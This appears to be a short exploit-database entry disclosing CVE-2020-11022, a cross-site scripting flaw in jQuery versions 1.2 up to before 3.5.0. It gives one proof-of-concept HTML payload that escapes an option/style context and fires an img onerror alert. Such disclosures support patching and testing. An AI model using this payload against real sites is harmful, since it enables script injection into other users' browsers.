jQuery 1.2 Cross Site Scripting

jQuery version 1.2 suffers from a cross site scripting vulnerability.


MD5 | f6880c94004df62f5be9b507d04e021f

# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
# CVE : CVE-2020-11022

# Proof of Concept 1:
<option><style></option></select><img src=x onerror=alert(1)></style>


Related Posts